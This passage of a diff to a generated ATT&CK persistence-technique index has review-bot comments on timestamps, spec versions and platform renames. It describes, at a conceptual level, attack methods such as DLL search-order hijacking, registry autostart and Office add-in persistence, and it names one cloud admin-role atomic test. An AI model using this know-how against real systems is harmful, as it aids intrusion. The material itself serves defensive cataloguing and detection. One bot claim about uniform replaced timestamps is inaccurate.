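Review bot: `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are removed from one position in T1574.011 (the `- x_mitre_attack_spec_version: 2.1.0` and `- x_mitre_modified_by_ref: ...` lines in the two hunks above) and re-added at the end of the entry here, so most of this diff is key-order churn rather than a data change. Consider having the generator emit keys in a fixed order so that future regenerations only show real field changes.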
@@ -28584,11 +28965,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28660,9 +29040,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
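Review bot: the Microsoft Run Key reference moves to `https://learn.microsoft.com/...` with a 2024 retrieval date, but the neighbouring Authentication Packages and TimeProvider references in this same hunk still point at `msdn.microsoft.com` (`aa374733.aspx`, `ms725475.aspx`). If this mirrors upstream ATT&CK data as-is that is fine; if links are being refreshed by hand, the other two should be updated in the same pass.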
@@ -28678,12 +29058,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
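Review bot: the `modified` timestamp for T1547.014 moves backwards, from `2023-05-09T14:00:00.188Z` to `2023-03-22T14:17:17.353Z`, and the same happens for T1542.005 (`2021-04-29` to `2020-10-22`) and T1505.002 (`2022-04-25` to `2021-10-18`) later in this patch. Every value being replaced ends in `14:00:00.188Z`, which looks like a batch stamp rather than a real edit time, so this is probably a correction to the true upstream value, but the commit message should say which ATT&CK bundle these were regenerated from so a reviewer can tell a data refresh from a stale snapshot.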
@@ -28758,7 +29137,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1542.005:
@@ -28801,7 +29179,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28825,8 +29203,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
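Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1542.005 without adding a replacement, whereas T1574.011 and T1547 above receive `x_mitre_attack_spec_version: 3.2.0` in exchange; T1505.002 below is treated the same way (`- spec_version` and `- x_mitre_attack_spec_version: 2.1.0` with no matching `+`). If these entries were simply not updated in the source data that is expected, but they then carry no spec version at all, so any validator that requires the key will reject them.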
@@ -28981,31 +29357,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -29022,6 +29378,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -29032,9 +29389,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -29042,17 +29403,37 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
@@ -29060,79 +29441,73 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
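Review bot: `x_mitre_permissions_required` (User, Administrator) is dropped from T1137 with no replacement, and the same removal happens for T1137.006 and T1556.002 later in this patch, while T1053.003 above keeps its `x_mitre_permissions_required: - User`. If the field is being retired upstream, the remaining occurrence is stale; if it is not, these removals lose data. Either way, check whether anything that filters the index by required permissions depends on the key. The platform rename from `Office 365` to `Office Suite` in the same hunk should likewise be reflected in any per-platform index derived from this list.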
@@ -29162,6 +29537,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -29172,6 +29548,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -29180,13 +29557,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -29228,9 +29605,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests:
- name: Azure AD - Add Company Administrator Role to a user
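Review bot: the platform list for T1098.003 drops `Azure AD`, `Google Workspace` and `Office 365` in favour of `Office Suite` and `Identity Provider` (hunk above), yet the first atomic test listed here is still named `Azure AD - Add Company Administrator Role to a user`. The name is accurate for the test itself, but confirm that whatever maps tests into per-platform index files understands the renamed platforms, so this test does not silently fall out of the index that previously covered the old platform name.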
@@ -29421,19 +29795,18 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -29449,8 +29822,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -29464,7 +29837,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -29490,6 +29863,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
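Review bot: the context line `Microsoft. (, May 23). Microsoft Security Advisory 2269637` has an empty year; that is upstream ATT&CK data rather than something this patch introduces, so it should be reported upstream rather than hand-edited in a generated file. The newly added Hexacorn reference does match the `(Citation: Hexacorn DLL Hijacking)` inserted into the T1574.001 description earlier in this patch, so the citation key and `source_name` are consistent.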
@@ -29517,42 +29894,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
@@ -29567,13 +29913,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
@@ -29581,11 +29932,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests: []
T1505.002:
@@ -29616,7 +29990,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
@@ -29654,13 +30028,11 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -29686,7 +30058,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -29728,7 +30100,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -29806,11 +30177,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29890,35 +30260,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
